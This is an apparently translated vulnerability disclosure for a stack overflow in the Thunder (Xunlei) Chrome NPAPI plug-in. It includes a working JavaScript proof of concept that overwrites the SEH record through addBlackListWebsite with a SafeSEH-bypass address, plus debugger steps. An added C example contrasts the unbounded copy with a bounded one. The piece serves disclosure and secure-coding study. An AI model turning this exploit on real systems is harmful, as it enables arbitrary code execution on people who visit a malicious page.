Thunder chrome plug-in stack overflow can cause arbitrary code execution

Source: Internet
Author: User

Thunder (Xunlei) is an Internet download tool developed by Xunlei, built on multi-resource hyper-threading technology. When Thunder is installed, the setup wizard recommends installing browser extensions. The Thunder Download Extension for Chrome has a stack overflow vulnerability: users who have the Thunder Chrome extension installed may have arbitrary code executed when they browse a malicious web page.

Details:

Test environment: Windows 2003, default configuration



Looking at the manifest.json of the Thunder Chrome extension shows that the extension ships an NPAPI (Netscape Plugin Application Programming Interface) plug-in, xl_chrome.dll, and that its public attribute is set to true, so xl_chrome can be instantiated and called by any web page.

POC (the original posting's display mangled the backslash escape sequences; below is the same POC with them restored):

<embed type="application/xl_chrome_plugin" id="xl_chrome_plugin">
<script>
var plugin = document.getElementById("xl_chrome_plugin");
function exploit() {
    var i = 0;
    var exploit_string = '';
    var nop = '\x72\x00\x72\x00';            // jz next_code
    var safeseh_addr = '\x0b\x0b\x27\x00';   // call [ebp+30h]
    var jz_seh_addr = '\x74\x22\x74\x22';    // skip seh
    while (i < 20012) { i += 1; exploit_string += 'a'; }
    exploit_string += jz_seh_addr;
    exploit_string += safeseh_addr;
    i = 0;
    while (i < 20000) { i += 1; exploit_string += '\x72\x00\x72\x00'; }   // nop
    plugin.addBlackListWebsite(exploit_string);
}
</script>

(Note from the original: the WooYun site replaced each backslash with two backslashes.)

The stack overflow is in AddBlackListWebsite, implemented by xl_chrome (AddBlackListPage is probably affected in the same way; the other methods were not tested).
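As an added illustration (not the xl_chrome code, whose source is not public), the following C models the pattern the write-up describes: a string controlled by the web page is copied into a fixed-size stack buffer with no length check, shown next to a bounded version that rejects oversized input. The buffer size, function names and status codes are assumptions; the 20012-byte filler mirrors the size of the POC's input.

```c
/* Added example, not the xl_chrome code (which is not public): a model of
 * the AddBlackListWebsite pattern from the write-up. Buffer size, names
 * and status codes are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SITE_MAX 260            /* assumed size of the stack buffer */

enum { BL_OK = 0, BL_TOO_LONG = -1, BL_BAD_ARG = -2 };

/* Vulnerable shape: the web page controls `url`, and it is copied into a
 * fixed stack buffer with no bound. The POC's 20012 filler bytes plus the
 * payload run past `site`, over the /GS cookie, the saved frame pointer
 * and the SEH record. The cookie is only checked in the epilogue; if the
 * copy faults first (the write exception the write-up observes), the
 * exception dispatcher uses the overwritten SEH record instead.
 * The returned length just gives the function an observable result. */
static int add_blacklist_website_unsafe(const char *url)
{
    char site[SITE_MAX];
    strcpy(site, url);                      /* unbounded copy */
    return (int)strlen(site);
}

/* Length of `s`, never reading more than `limit` bytes (like strnlen,
 * spelled out here so the example has no POSIX dependency). */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened shape: refuse anything that does not fit, terminator included,
 * instead of truncating silently. `out` is the caller's buffer, so the
 * check is against a size the function actually knows. */
static int add_blacklist_website_safe(const char *url, char *out, size_t out_len)
{
    size_t n;
    if (url == NULL || out == NULL || out_len == 0)
        return BL_BAD_ARG;
    n = bounded_len(url, out_len);
    if (n >= out_len)
        return BL_TOO_LONG;
    memcpy(out, url, n + 1);                /* n < out_len, so n+1 fits */
    return BL_OK;
}

/* Constructed input: n bytes of 'a', like the filler in the POC. */
static char *make_filler(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'a', n);
    s[n] = '\0';
    return s;
}

/* Copy `url` into a local buffer through the bounded version and return
 * the status, so callers can check the outcome without managing buffers. */
static int try_safe(const char *url)
{
    char site[SITE_MAX];
    return add_blacklist_website_safe(url, site, sizeof site);
}

/* Same, with a constructed filler of n bytes as the input. */
static int try_safe_filler(size_t n)
{
    char *s = make_filler(n);
    int rc;
    if (s == NULL)
        return BL_BAD_ARG;
    rc = try_safe(s);
    free(s);
    return rc;
}

int main(void)
{
    /* The unbounded version is only exercised with input that fits;
     * passing it the POC-sized filler would corrupt this stack frame. */
    printf("unsafe, short input: %d bytes copied\n",
           add_blacklist_website_unsafe("http://example.com"));
    printf("safe, short input: %d\n", try_safe("http://example.com"));
    printf("safe, 20012-byte filler: %d\n", try_safe_filler(20012));
    printf("safe, %d-byte filler (largest that fits): %d\n",
           SITE_MAX - 1, try_safe_filler(SITE_MAX - 1));
    printf("safe, %d-byte filler (one too many): %d\n",
           SITE_MAX, try_safe_filler(SITE_MAX));
    return 0;
}
```

Under these assumptions the bounded version returns BL_TOO_LONG for the 20012-byte filler and BL_OK for anything up to SITE_MAX - 1 bytes. The point relative to the write-up is that /GS only catches the overwrite when the function returns; a length check before the copy is the fix, not the cookie.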



Checking the program's protections with mona (the Immunity Debugger plug-in):
 

SafeSEH is enabled, so an address that bypasses SafeSEH has to be found.

In the end, 0x00270b0b is chosen as the jump address.



Command line:

chrome.exe --plugin-startup-dialog





Started this way, Chrome pops up a dialog showing the plug-in process ID; attach Immunity Debugger to that process. Then open the POC page in Chrome, press F12 to open the console, and call exploit() (the code is wrapped in a function to make debugging easier); a write exception is triggered.
 

I forgot to mention: because the program is compiled with /GS, the overflow can only be used to overwrite the SEH record and trigger an exception, so that execution enters the exception handler.

At that point the exception chain has been overwritten with 0x00270B0B, the SafeSEH-bypass address we chose, which finally returns to a location we control.

What remains is the shellcode.

Solution:

Google announced long ago that NPAPI would be dropped. Why does Thunder dare to keep using it?

 
